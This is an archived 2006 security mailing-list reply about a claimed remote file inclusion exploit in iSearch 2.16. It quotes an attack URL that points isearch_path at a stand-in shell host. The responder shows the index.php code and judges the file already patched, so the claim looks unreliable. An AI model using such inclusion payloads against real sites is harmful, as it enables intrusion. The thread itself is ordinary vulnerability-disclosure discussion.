[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit

To: "xp1o@xxxxxxx" <xp1o@xxxxxxx>
Subject: Re: The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Mon, 9 Oct 2006 14:32:50 -0500

On 7 Oct 2006 22:14:00 -0000, xp1o@xxxxxxx <xp1o@xxxxxxx> wrote:

#The latest version of iSearch is V2.16 <=  (index.php) Remote File Inclusion 
Exploit
#Vlu Code :
#
#htpp://sitename.com/[scerpitPath]/index.php?isearch_path=http://SHELLURL.COM



$isearch_path = dirname(__FILE__);
define('IN_ISEARCH', true);

require_once "$isearch_path/inc/core.inc.php";
require_once "$isearch_path/inc/search.inc.php";

index.php seems patched to me.

/str0ke

References:
- The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit
  - From: xp1o

Prev by Date: MHL-2006-001 Public Advisory: "Eazy Cart" Multiple Security Issues
Next by Date: eXpBlog <= 0.3.5 Cross Site Scripting Vulnerabilities
Previous by thread: The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit
Next by thread: [ECHO_ADV_49$2006]OpenDock Easy Doc <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
Index(es):
- Date
- Thread